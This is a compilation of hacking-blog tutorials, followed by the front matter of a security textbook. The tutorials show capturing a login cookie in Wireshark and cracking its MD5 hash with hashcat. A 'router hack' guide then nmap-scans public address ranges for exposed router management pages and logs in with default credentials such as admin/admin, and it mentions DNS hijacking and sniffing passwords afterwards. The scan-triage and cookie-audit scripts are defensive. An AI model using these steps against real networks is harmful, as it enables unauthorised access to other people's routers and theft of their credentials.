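                findings.append(f"cookie '{cname}' looks like an unsalted {shape} digest: "
                                "replayable and dictionary-crackable")
        if "secure" not in attrs:        # cookie will also travel over plain HTTP
            findings.append(f"cookie '{cname}' lacks Secure")
        if "httponly" not in attrs:      # cookie readable by page scripts
            findings.append(f"cookie '{cname}' lacks HttpOnly")
    return findings


if __name__ == "__main__":
    for finding in audit_exchange(SAMPLE_REQUEST, SAMPLE_RESPONSE):
        print("-", finding)
```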
## Step 3: Analyze POST data for username and password

Now right click on that line and select Follow TCP Stream. This will open a new window that contains something like this:

HTTP/1.1 302 Found
Date: Mon, 10 Nov 2014 23:52:21 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: non=non; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/
Set-Cookie: password=e4b7c855be6e3d4307b8d6ba4cd4ab91; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/
Set-Cookie: scifuser=sampleuser; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/
Location: loggedin.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

I've highlighted the user name and password fields. So in this case,

1. username: sampleuser
2. password: e4b7c855be6e3d4307b8d6ba4cd4ab91

But hang on, e4b7c855be6e3d4307b8d6ba4cd4ab91 can't be a real password. It must be a hash value. Note that some websites don't hash passwords at all, even during sign on. For those, you've already got the username and password. In this case, let's go a bit further and identify this hash value.

## Step 4: Identify hash type

I will use hash-identifier to find out which type of hash that is. Open a terminal, type in hash-identifier and paste the hash value. hash-identifier will give you possible matches. See screenshot below:

Now one thing is for sure, we know it's not a Domain Cached Credential. So it must be an MD5 hash value. I can crack that using hashcat or cudahashcat.

## Step 5: Cracking MD5 hashed password

I can easily crack this simple password using hashcat or similar software.
root@kali:~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
(or)
root@kali:~# cudahashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
(or)
root@kali:~# cudahashcat32 -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
(or)
root@kali:~# cudahashcat64 -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Because this was a simple password that existed in my password list, hashcat cracked it very easily.

#### Cracking password hashes

Our final outcome looks like this:

1. username: sampleuser
2. password: e4b7c855be6e3d4307b8d6ba4cd4ab91:simplepassword

## Conclusion

Well, to be honest it's not possible for every website owner to implement SSL to secure passwords; some SSL certificates cost you up to $1500 per URL (well, you can get $10 ones too, but I personally never used those so I can't really comment). But the least website owners (public ones where anyone can register) should do is implement hashing during login procedures. That way, at least the password is hashed, and that adds one more hurdle for someone trying to hack website passwords easily. Actually it's a big one, as SSL encryption (theoretically) can take 100+ years to break even with the best supercomputer of today. Enjoy and use this guide responsibly. Please share and RT. Thanks.

## Router Hack – How to hack ADSL router using NMAP

An asynchronous digital subscriber line (DSL or ADSL) modem is a device used to connect a computer or router to a telephone line which provides the digital subscriber line service for connectivity to the Internet, which is often called DSL or ADSL broadband. In this guide I will show you how to scan an IP range for connected ADSL or DSL modem routers and find DSL ADSL router hacks remotely. This guide applies to Windows, Linux or Mac, so it doesn't matter what your operating system is, you can try the same steps from all these operating systems.
The term DSL or ADSL modem is technically used to describe a modem which connects to a single computer, through a USB port or is installed in a computer PCI slot. The more common DSL or ADSL router, which combines the function of a DSL or ADSL modem and a home router, is a standalone device which can be connected to multiple computers through multiple Ethernet ports or an integral wireless access point. Also called a residential gateway, a DSL or ADSL router usually manages the connection and sharing of the DSL or ADSL service in a home or small office network. Put this together with Wireshark hacking of HTTP websites and you have a nightmare for the user behind that router, as all their passwords and details can be tracked very easily.

## What's in a DSL ADSL Router?

A DSL or ADSL router consists of a box which has an RJ11 jack to connect to a standard subscriber telephone line. It has several RJ45 jacks for Ethernet cables to connect it to computers or printers, creating a local network. It usually also has a USB jack which can be used to connect to computers via a USB cable, to allow connection to computers without an Ethernet port. A wireless DSL or ADSL router also has antennas to allow it to act as a wireless access point, so computers can connect to it forming a wireless network. Power is usually supplied by a cord from a wall wart transformer. It usually has a series of LED status lights which show the status of parts of the DSL or ADSL communications link:

1. Power light – indicates that the modem is turned on and has power.
2. Ethernet lights – There is usually a light over each Ethernet jack. A steady (or sometimes flashing) light indicates that the Ethernet link to that computer or device is functioning.
3. DSL or ADSL light – a steady light indicates that the modem has established contact with the equipment in the local telephone exchange (DSLAM) so the DSL or ADSL link over the telephone line is functioning.
4.
Internet light – a steady light indicates that the IP address and DHCP protocol are initialized and working, so the system is connected to the Internet 5. Wireless light – only in wireless DSL or ADSL modems, this indicates that the wireless network is initialized and working Almost every ADSL DSL modem router provides a management web-page available via Internal network (LAN or Local area network) for device management, configuration and status reporting. You are supposed to login to the management web-page, configure a username password combination provided by your ISP (Internet service provider) which then allows you to connect to internet. The network is divided into two parts: #### External Network External network indicates the part where ADSL DSL modem routers connects to upstream provider for internet connectivity. Once connected to the ISP via a Phone line (ADSL DSL Modem routers can use conventional Copper Phone lines to connect to ISP at a much higher speed), the router gets an IP address. This is usually a Publicly routable IP address which is open to the whole world. #### Internal Network Internal network indicates the part where devices in Local Area Network connects to the ADSL DSL modem router via either Wireless or Ethernet cable. Most modem DSL ADSL Modem routers runs a DHCP server internally which assigns an Internall IP address to the connected device. When I say device, this can be anything from a conventional computer, a laptop, a phone (Android, Apple, Nokia or Blackberry etc.), A smart TV, A Car, NAS, SAN, An orange, A banana, A cow, A dragon, Harry Potter … I mean anything that’s able to connect to internet! So you get the idea. Each device get’s it’s own IP address, a Gateway IP and DNS entries. Depending on different DSL ADSL Modem router, this can be slightly different, but the idea remains the same, the DSL ADSL Router allows users to share internet connectivity. 
These DSL ADSL modem routers are like miniature gateway devices that can have many services running on them. Usually they all run BusyBox or similar proprietary Linux applications. You want to know what a DSL ADSL router can do? Here’s a list of common services that can run on a DSL ADSL modem router:

1. ADSL2 and/or ADSL2+ support
2. Antenna/ae (wireless)
3. Bridge/Half-bridge mode
4. Cookie blocking
5. DHCP server
6. DDNS support
7. DoS protection
8. Switching
9. Intrusion detection
10. LAN port rate limiting
11. Inbuilt firewall
12. Inbuilt or free micro-filter
13. Java/ActiveX applet blocking
14. Javascript blocking
15. MAC address filtering
16. Multiple public IP address binding
17. NAT
18. Packet filter
19. Port forwarding/port range forwarding
20. POP mail checking
21. QoS (especially useful for VoIP applications)
22. RIP-1/RIP-2
23. SNTP facility
24. SPI firewall
25. Static routing
26. So-called “DMZ” facility
27. RFC1483 (bridged/routed)
28. IPoA
29. PPPoE
30. PPPoA
31. Embedded PPPoX login clients
32. Parental controls
33. Print server inbuilt
34. Scheduling by time/day of week
35. USB print server
36. URL blocking facility
37. UPnP facility
38. VPN pass-through
39. Embedded VPN servers
40. WEP 64/128/256 bit (wireless security)
41. WPA (wireless security)
42. WPA-PSK (wireless security)

That’s a lot of services running on a small device, configured by nanny, granny, uncle, aunt and the next door neighbour: in short, many non-technical people around the world. How many of those are configured badly? Left ports open left, right and center? Didn’t change default admin passwords? Many! I mean MANY! In this guide we will use nmap to scan a range of IP addresses; from the output we will determine which are DSL ADSL routers that have left their management ports open to the external network (again, read the section above to know which one the external network is).
A typical ADSL router’s management interface is available via one of the following URLs:

http://10.0.0.1/

http://192.168.0.1/

http://192.168.1.1/

http://192.168.1.254/

etc. This is the management page for the DSL ADSL modem router and it’s always protected by a password. By default, this password is written on a sticker underneath the DSL ADSL modem router and it is one of these combinations (username/password):

• admin/admin
• admin/password
• admin/pass
• admin/secret

etc. A lot of home users don’t change this password. Well, that’s OK; it doesn’t hurt much, because this page is only available from a connected device. But what’s not OKAY is when users open up their management interface to the external network. All you need to know is the public IP address of your target, and you can try to access this management page externally.

## Installing NMAP

I use Kali Linux, which comes with NMAP preinstalled. If you are using Windows or Mac (or any other flavour of Linux), go to the following website to download and install NMAP.

#### Linux Installation:

For Ubuntu, Debian or other apt-based systems, NMAP is usually available in the default repository. Install NMAP using the following command:

sudo apt-get install nmap

For YUM-based systems such as Red Hat and CentOS, install via:

sudo yum install nmap

For pacman-based systems such as Arch Linux, install via:

sudo pacman -S nmap

#### Windows Installation:

For Windows computers, download the installer and run the executable. Link: http://nmap.org/dist/nmap-6.46-setup.exe

#### Mac Installation:

For Mac users, download the installer and install it. Link: http://nmap.org/dist/nmap-6.46.dmg

#### Official NMAP site

You can read more about NMAP here: http://nmap.org/

## Search for Vulnerable Routers

Now that we have NMAP sorted, we are going to run the following command to scan for ADSL modem routers based on their banner on port 80. All you need is to pick an IP range. I’ve used an example below using the 101.53.64.1/24 range.
### Search from Linux using command line

In Linux run the following command:

nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'

In Windows or Mac open NMAP and copy-paste this line:

nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -

Once it finds the results, search for the word ‘open’ to narrow them down. A typical Linux NMAP command would return output like the lines below (and of course I’ve changed the IP details):

Host: 101.53.64.3 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.4 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.9 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.19 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.20 () Ports: 80/open/tcp//http//Fortinet VPN|firewall http config/
Host: 101.53.64.23 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.31 () Ports: 80/open/tcp//http?///
Host: 101.53.64.33 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.35 () Ports: 80/open/tcp//http?///
Host: 101.53.64.37 () Ports: 80/open/tcp//http?///
Host: 101.53.64.49 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.52 () Ports: 80/open/tcp//http?///
Host: 101.53.64.53 () Ports: 80/open/tcp//ssl|http//thttpd/
Host: 101.53.64.58 () Ports: 80/open/tcp//http?///
Host: 101.53.64.63 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.69 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.73 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.79 () Ports: 80/open/tcp//http//Apache httpd/
Host: 101.53.64.85 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.107 () Ports: 80/open/tcp//http?///
Host: 101.53.64.112 () Ports: 80/open/tcp//http?///
Host: 101.53.64.115 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.123 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.129 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.135 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.145 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.149 () Ports: 80/open/tcp//http//Microsoft IIS httpd 6.0/
Host: 101.53.64.167 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.170 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.186 () Ports: 80/open/tcp//http?///
Host: 101.53.64.188 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.193 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.202 () Ports: 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/
Host: 101.53.64.214 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.224 () Ports: 80/open/tcp//http//Allegro RomPager 4.51 UPnP|1.0 (ZyXEL ZyWALL 2)/

This was taking a long time (we are, after all, trying to scan 256 hosts using the command above). Being impatient, I wanted to check whether my Kali Linux box was actually doing anything. I used the following command in a separate terminal to monitor what my PC was doing… it was doing a lot:

tcpdump -ni eth0

That’s a lot of connected hosts with TCP port 80 open. Some are marked ‘tcpwrapped’. It means they are possibly not accessible.

### Search from Windows, Mac or Linux using GUI – NMAP or Zenmap

Assuming you got the NMAP installation sorted, you can now open NMAP (in Kali Linux or a similar Linux distro you can use Zenmap, the cross-platform GUI version of nmap). Copy-paste the following line into the Command field:

nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/26 -p80 -oG -

Another version of this command uses a different representation of the subnet mask:

nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -

Press the SCAN button and wait a few minutes until the scan is over. Once you have some results, you need to find the devices with open ports. In the search result page:

1. Click on the Services button
2. Click on the http service
3. Click on the Ports/Hosts tab (twice, to sort them by status)

As you can see, I’ve found a few devices with http port 80 open. It is quite amazing how many devices have ports open facing the outer DMZ.

## Access Management Webpage

Pick one at a time. For example try this:

http://101.53.64.3

http://101.53.64.4

http://101.53.64.129

You get the idea. If it opens a web page asking for a username and password, try one of the following combinations:

• admin/admin
• admin/password
• admin/pass
• admin/secret

If you can find the router’s model number and make, you can find the exact username and password from this web page: http://portforward.com/default_username_password/

Before we finish up, I am sure you were already impatient like me, as a lot of the routers had ‘tcpwrapped’ on them, which was actually stopping us from accessing the web management interface. The following command will exclude those devices from our search. I’ve also expanded my search to a broader range using a slightly different subnet mask:

nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/22 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'

In this command I am using a /22 subnet mask with two filters on the output: I am looking for the word ‘open’ and excluding ‘tcpwrapped’. As you can see, I still get a lot of output.

## Conclusion

You’ll be surprised how many have the default username and password still enabled. Once you have access to the router, you can do a lot more, like DNS hijacking, stealing usernames and passwords (for example social media credentials for Facebook, Twitter, webmail etc.) using tcpdump/snoop on the router’s interface, and many more … There are many things you can do after you’ve got access to a router. You can change DNS settings, set up a tcpdump and later snoop all plaintext passwords using Wireshark, etc. If you know a friend, family member, colleague or neighbor who didn’t change their router’s default password, let them know of the risks.
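The post sorts the grepable output above by hand, with grep, into three piles: hosts whose banner identifies a service, hosts nmap could only guess at (`http?`), and `tcpwrapped` hosts. As an added example (not code from the original post, and not part of nmap), here is a small Python parser for nmap’s `-oG` format that does the same triage on a saved scan of your own address space, flags the embedded-server banners that the output above shows on SOHO devices (RomPager, micro_httpd, thttpd, a heuristic assumption here rather than a fingerprint database), and works out how many addresses a target spec like `101.53.64.1/22` or `101.53.64.1-255` actually covers. The sample lines are constructed in the format shown above using TEST-NET-1 addresses, not hosts from the post.

```python
"""Triage nmap grepable (-oG) output for hosts exposing a web interface.

Added example for this post (not code from the original post or from nmap).
The sample below is constructed in the -oG format shown above, using
TEST-NET-1 addresses rather than any host from the post.
"""
import ipaddress
import re
import sys

# Constructed sample. Real -oG output separates "Host:" and "Ports:" with a
# tab; the regex below accepts either a tab or spaces.
SAMPLE_OUTPUT = """\
# Nmap 6.46 scan initiated (constructed sample, not real scan output)
Host: 192.0.2.3 ()  Ports: 80/open/tcp//tcpwrapped///
Host: 192.0.2.4 ()  Ports: 80/open/tcp//http//micro_httpd/
Host: 192.0.2.31 () Ports: 80/open/tcp//http?///
Host: 192.0.2.53 () Ports: 80/open/tcp//ssl|http//thttpd/
Host: 192.0.2.73 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 192.0.2.79 () Ports: 80/open/tcp//http//Apache httpd/
Host: 192.0.2.90 () Ports: 80/closed/tcp//http///
Host: 192.0.2.91 () Ports: 80/filtered/tcp//http///
# Nmap done (constructed sample)
"""

# Banners the scan output above shows on small embedded web servers. This is
# a heuristic assumption for the example, not a fingerprint database.
EMBEDDED_BANNERS = ("RomPager", "micro_httpd", "thttpd")

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+Ports:\s+(.*)$")


def parse_grepable(text):
    """Return one dict per port entry. nmap writes each entry as
    port/state/protocol/owner/service/rpcinfo/version/ and replaces any
    '/' inside a field with '|', which is undone here."""
    records = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and 'Status: Up' lines carry no ports
        ip, hostname, ports = m.groups()
        ports = ports.split("\t")[0]  # drop a trailing 'Ignored State:' column
        for entry in ports.split(", "):
            fields = entry.split("/")
            if len(fields) < 7:
                continue  # malformed entry, skip rather than crash
            port, state, proto, _owner, service, _rpc, version = fields[:7]
            records.append({
                "ip": ip, "hostname": hostname, "port": int(port),
                "state": state, "proto": proto,
                "service": service.replace("|", "/"),
                "version": version.replace("|", "/"),
            })
    return records


def likely_embedded(version):
    """True when the version banner names one of the embedded servers."""
    return any(b in version for b in EMBEDDED_BANNERS)


def triage(records):
    """Split findings into the outcomes the post sorts through with grep:
    fingerprinted service, unidentified responder ('http?'), tcpwrapped
    (connection accepted then dropped, so probably not browsable), not open."""
    out = {"identified": [], "unidentified": [], "tcpwrapped": [], "not_open": []}
    for r in records:
        if r["state"] != "open":
            out["not_open"].append(r["ip"])
        elif r["service"] == "tcpwrapped":
            out["tcpwrapped"].append(r["ip"])
        elif r["service"].endswith("?") or not r["version"]:
            out["unidentified"].append(r["ip"])
        else:
            out["identified"].append((r["ip"], r["service"], r["version"]))
    return out


def range_size(spec):
    """Address count of an nmap target spec in either form the post uses:
    CIDR ('a.b.c.d/22') or a last-octet range ('a.b.c.1-255')."""
    if "/" in spec:
        return ipaddress.ip_network(spec, strict=False).num_addresses
    _base, _, last = spec.rpartition(".")
    lo, _, hi = last.partition("-")
    return int(hi or lo) - int(lo) + 1


def report(text):
    """Human-readable summary of a saved -oG scan."""
    t = triage(parse_grepable(text))
    lines = []
    for ip, service, version in t["identified"]:
        tag = " [embedded]" if likely_embedded(version) else ""
        lines.append("%-16s %-10s %s%s" % (ip, service, version, tag))
    lines.append("unidentified: %s" % ", ".join(t["unidentified"]))
    lines.append("tcpwrapped:   %s" % ", ".join(t["tcpwrapped"]))
    return "\n".join(lines)


if __name__ == "__main__":
    # usage: nmap ... -oG scan.gnmap ; python triage.py scan.gnmap
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_OUTPUT
    print(report(data))
```

Save the scan with `-oG scan.gnmap` instead of `-oG -` and pass the file to the script; run without an argument it triages the constructed sample. The `[embedded]` tag is the list a network owner should walk first when checking which of their own devices expose a management page to the outside.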
But I am not here to judge whether it should be done or not; this is definitely a way to gain access to a router. So hacking is not always bad; it is sometimes required when you lose access or a system just wouldn’t respond. As a pentester, you should raise awareness. Share this guide, as anyone who uses Linux, Windows or Mac can use it to test their own network and fix the issue.

## Hacker Techniques, Tools And Incident Handling – Jones And Bartlett Learning

Full text can be downloaded in pdf format (eBook): https://ia802303.us.archive.org/13/items/HackerTechniquesAndTools/Hacker%20techniques%20and%20tools.pdf

Jones & Bartlett Learning, Information Systems Security & Assurance Series

Hacker Techniques, Tools, and Incident Handling

Sean-Philip Oriyano and Michael Gregg

World Headquarters: Jones & Bartlett Learning, 40 Tall Pine Drive, Sudbury, MA 01776, 978-443-5000, info@jblearning.com, www.jblearning.com

Jones & Bartlett Learning Canada, 6339 Ormindale Way, Mississauga, Ontario L5V 1J2, Canada

Jones & Bartlett Learning International, Barb House, Barb Mews, London W6 7PA, United Kingdom

Jones & Bartlett Learning books and products are available through most bookstores and online booksellers. To contact Jones & Bartlett Learning directly, visit http://www.jblearning.com. Substantial discounts on bulk quantities of Jones & Bartlett Learning publications are available to corporations, professional associations, and other qualified organizations; contact the special sales department at specialsales@jblearning.com.

Copyright © 2011 by Jones & Bartlett Learning, LLC. All rights reserved.
No part of the material protected by this copyright may be reproduced or utilized in any form, electronic or mechanical, including photocopying, recording, or by any information storage and retrieval system, without written permission from the copyright owner.

This publication is designed to provide accurate and authoritative information in regard to the subject matter covered. It is sold with the understanding that the publisher is not engaged in rendering legal, accounting, or other professional service. If legal advice or other expert assistance is required, the service of a competent professional person should be sought.

Production Credits: Chief Executive Officer: Ty Field; President: James Homer; SVP, Chief Operating Officer: Don Jones, Jr.; SVP, Chief Technology Officer: Dean Fossella; SVP, Chief Marketing Officer: Alison M. Pendergast; SVP, Chief Financial Officer: Ruth Siporin; SVP, Business Development: Christopher Will; VP, Design and Production: Anne Spencer; VP, Manufacturing and Inventory Control: Therese Connell; Editorial Management: High Stakes Writing, LLC, Editor and Publisher: Lawrence J. Goodrich; Reprints and Special Projects Manager: Susan Schultz; Associate Production Editor: Tina Chen; Director of Marketing: Alisha Weisman; Senior Marketing Manager: Andrea DeFronzo; Cover Design: Anne Spencer; Composition: Mia Saunders Design; Cover Image: © Handy Widiyanto/ShutterStock, Inc.; Chapter Opener Image: © Rodolfo Clix/Dreamstime.com; Printing and Binding: Malloy, Inc.; Cover Printing: Malloy, Inc.
Printed in the United States of America.

Contents

Each chapter closes with a Chapter Summary, Key Concepts and Terms, and a Chapter Assessment.

Preface; Acknowledgments

PART ONE – Hacker Techniques and Tools

CHAPTER 1 – Hacking: The Next Generation
- Profiles of Hackers, Crackers, and Cybercriminals
- The Hacker Mindset
- A Look Back at the History of Computer Hacking
- Ethical Hacking and Penetration Testing
- The Role of Ethical Hacking
- Common Hacking Methodologies
- Performing a Penetration Test
- The Role of the Law and Ethical Standards

CHAPTER 2 – TCP/IP Review
- Exploring the OSI Reference Model
- The Role of Protocols
- Layer 1: Physical Layer; Layer 2: Data Link Layer; Layer 3: Network Layer; Layer 4: Transport Layer; Layer 5: Session Layer; Layer 6: Presentation Layer; Layer 7: Application Layer
- Mapping the OSI to Functions and Protocols
- TCP/IP (A Layer-by-Layer Review)
- Physical/Network Access Layer; Internetwork Layer; Host-to-Host Layer; Application Layer

CHAPTER 3 – Cryptographic Concepts
- Cryptographic Basics
- Cryptographic History
- Symmetric Encryption
- Asymmetric Encryption
- Digital Signatures
- Purpose of Public Key Infrastructure
- The Role of Certificate Authorities (CAs)
- PKI Attacks
- Hashing
- Common Cryptographic Systems
- Cryptanalysis

CHAPTER 4 – Physical Security
- Basic Equipment Controls
- Hard Drive and Mobile Device Encryption
- Fax Machines and Public Branch Exchanges
- Voice over IP (VoIP)
- Physical Area Controls: Fences; Gates; Bollards
- Facility Controls: Doors, Mantraps, and Turnstiles; Walls, Ceilings, and Floors; Windows; Guards and Dogs; Construction
- Personal Safety Controls: Lighting; Alarms and Intrusion Detection; Closed-Circuit TV (CCTV)
- Physical Access Controls: Locks; Lock Picking; Tokens and Biometrics
- Avoiding Common Threats to Physical Security: Natural, Human, and Technical Threats; Physical Keyloggers and Sniffers; Wireless Interception and Rogue Access Points
- Defense in Depth

PART TWO – A Technical Overview of Hacking

CHAPTER 5 – Footprinting Tools and Techniques
- The Information-Gathering Process
- The Information on a Company Web Site
- Discovering Financial Information
- Google Hacking
- Exploring Domain Information Leakage: Manual Registrar Query; Automatic Registrar Query; Whois; Nslookup; Internet Assigned Numbers Authority (IANA); Determining a Network Range
- Tracking an Organization’s Employees
- Exploiting Insecure Applications
- Using Basic Countermeasures

CHAPTER 6 – Port Scanning
- Determining the Network Range
- Identifying Active Machines: Wardialing; Wardriving; Pinging; Port Scanning
- Mapping Open Ports: Nmap; Superscan; Scanrand; THC-Amap
- OS Fingerprinting: Active OS Fingerprinting; Passive OS Fingerprinting
- Mapping the Network: Cheops; Solarwinds
- Analyzing the Results

CHAPTER 7 – Enumeration and Computer System Hacking
- Windows Basics: Controlling Access; Users; Groups; Security Identifiers
- Commonly Attacked and Exploited Services
- Enumeration: NULL Session; Working with Nbtstat; SuperScan; SNScan
- System Hacking: Types of Password Cracking; Passive Online Attacks; Active Online Attacks; Offline Attacks; Nontechnical Attacks; Using Password Cracking
- Privilege Escalation
- Planting Backdoors: Using PsTools; Rootkits
- Covering Tracks: Disabling Auditing; Data Hiding

CHAPTER 8 – Wireless Vulnerabilities
- The Importance of Wireless Security: Emanations; Common Support and Availability
- A Brief History of Wireless Technologies: 802.11; 802.11b; 802.11a; 802.11g; 802.11n; Other Wireless Technologies
- Working with and Securing Bluetooth: Bluetooth Security
- Working with Wireless LANs: CSMA/CD Versus CSMA/CA; Role of APs; Service Set Identifier (SSID); Association with an AP; The Importance of Authentication; Working with RADIUS; Network Setup Options
- Threats to Wireless LANs: Wardriving; Misconfigured Security Settings; Unsecured Connections; Rogue APs; Promiscuous Clients; Wireless Network Viruses; Countermeasures
- Wireless Hacking Tools: Netstumbler; inSSIDer
- Protecting Wireless Networks: Default AP Security; Placement; Emanations; Rogue APs; Use Protection for Transmitted Data; MAC Filtering

CHAPTER 9 – Web and Database Attacks
- Attacking Web Servers: Categories of Risk
- Vulnerabilities of Web Servers: Improper or Poor Web Design; Buffer Overflow; Denial of Service (DoS) Attack; Distributed Denial of Service (DDoS) Attack; Banner Information; Permissions; Error Messages; Unnecessary Features; User Accounts
- Structured Query Language (SQL) Injections: Examining an SQL Injection
- Vandalizing Web Servers: Input Validation; Cross-Site Scripting (XSS)
- Anatomy of Web Applications: Insecure Logon Systems; Scripting Errors; Session Management Issues; Encryption Weaknesses
- Database Vulnerabilities: A Look at Databases; Vulnerabilities; Locating Databases on the Network; Database Server Password Cracking; Locating Vulnerabilities in Databases
- Out of Sight, Out of Mind

CHAPTER 10 – Malware, Worms, and Viruses
- Malware: Malware’s Legality; Types of Malware; Malware’s Targets
- Viruses and How They Function: Viruses: A History; Types of Viruses; Prevention Techniques
- Worms and How They Function: How Worms Work; Stopping Worms; The Power of Education; Antivirus and Firewalls
- Spyware: Methods of Infection; Bundling with Software
- Adware
- Scareware

CHAPTER 11 – Trojans and Backdoors
- Significance of Trojans
- Methods to Get Trojans onto a System
- Targets of Trojans
- Known Symptoms of an Infection
- Detection of Trojans and Viruses: Vulnerability Scanners; Antivirus
- Trojan Tools: An In-Depth Look at BO2K
- Distribution Methods: Using Wrappers to Install Trojans; Trojan Construction Kits
- Backdoors
- Covert Communication: The Role of Keyloggers; Software; Port Redirection
- Software Protection

CHAPTER 12 – Sniffers, Session Hijacking, and Denial of Service Attacks
- Sniffers: Passive Sniffing; Active Sniffing; Sniffing Tools; What Can Be Sniffed?
- Session Hijacking: Identifying an Active Session; Seizing Control of a Session; Session Hijacking Tools; Thwarting Session Hijacking Attacks
- Denial of Service (DoS) Attacks: Categories of DoS Attacks; Tools for DoS
- Distributed Denial of Service (DDoS) Attacks: Some Characteristics of DDoS Attacks; Tools for DDoS; Botnets

CHAPTER 13 – Linux, Live CDs, and Automated Assessment Tools
- Linux: A Look at the Interface; Basic Linux Navigation; Important Linux Directories; Users, Groups, and Special Accounts; Working with Permissions; Commonly Used Commands; Basic Command Structure
- Ipchains and Iptables: Ipchains; Iptables
- Live CDs: Special Purpose Live CDs; Trinity; Caine; Astaro; Damn Vulnerable Linux; Network Security Toolkit (NST)
- Automated Assessment Tools: Source Code Scanners; Application Level Scanners; System-Level Scanners

PART THREE – Incident Response and Defensive Technologies

CHAPTER 14 – Incident Response
- What Is a Security Incident?
- The Incident Response Process: Incident Response Policies, Procedures, and Guidelines; Phases of an Incident and Response; Incident Response Team; Incident Response Plans (IRPs); The Role of Business Continuity Plans (BCPs)
- Recovering Systems: Business Impact Analysis; Planning for Disaster and Recovery; Preparation and Staging of Testing Procedures; Frequency of Tests; Analysis of Test Results
- Evidence Handling and Administration: Evidence Collection Techniques; Security Reporting Options and Guidelines; Affected Party Legal Considerations
- Requirements of Regulated Industries: Payment Card Industry Data Security Standard (PCI DSS)

CHAPTER 15 – Defensive Technologies
- Intrusion Detection Systems (IDSs): IDS Components; Components of NIDS; Components of HIDS; Setting Goals; Accountability; Limitations of an IDS; Investigation of an Event; Analysis of Information Collected
- Intrusion Prevention Systems (IPSs)
- The Purpose of Firewalls: How Firewalls Work; Firewall Methodologies; Limitations of a Firewall; Implementing a Firewall; Authoring a Firewall Policy
- Honeypots/Honeynets: Goals of Honeypots; Legal Issues
- Role of Controls: Administrative Controls; Technical Controls; Physical Controls

APPENDIX A – Answer Key

APPENDIX B – Standard Acronyms

Glossary of Key Terms; References; Index

Preface

Purpose of This Book

This book is part of the Information Systems Security & Assurance Series from Jones & Bartlett Learning (www.jblearning.com).
Designed for courses and curriculums in IT Security, Cybersecurity, Information Assurance, and Information Systems Security, this series features a comprehensive, consistent treatment of the most current thinking and trends in this critical subject area. These titles deliver fundamental information-security principles packed with real-world applications and examples. Authored by Certified Information Systems Security Professionals (CISSPs), they deliver comprehensive information on all aspects of information security. Reviewed word for word by leading technical experts in the field, these books are not just current but forward-thinking, putting you in the position to solve the cybersecurity challenges not just of today, but of tomorrow, as well.

The first part of this book on information security examines the landscape, key terms, and concepts that a security professional needs to know about hackers and computer criminals who break into networks, steal information, and corrupt data. It covers the history of hacking and the standards of ethical hacking. The second part examines the technical overview of hacking: how attacks target networks and the methodology they follow. It reviews the various methods attackers use, including footprinting, port scanning, enumeration, malware, sniffers, and denial of service. The third part reviews incident response and defensive technologies: how to respond to hacking attacks and how to fend them off, especially in an age of increased reliance on the Web.

Learning Features

The writing style of this book is practical and conversational. Each chapter begins with a statement of learning objectives. Step-by-step examples of information security concepts and procedures are presented throughout the text. Illustrations are used both to clarify the material and to vary the presentation. The text is sprinkled with Notes, Tips, FYIs, Warnings, and sidebars to alert the reader to additional helpful information related to the subject under discussion. Chapter Assessments appear at the end of each chapter, with solutions provided in the back of the book. Chapter summaries are included in the text to provide a rapid review or preview of the material and to help students understand the relative importance of the concepts presented.

Audience

The material is suitable for undergraduate or graduate computer science majors or information science majors, students at a two-year technical college or community college who have a basic technical background, or readers who have a basic understanding of IT security and want to expand their knowledge.

Acknowledgments

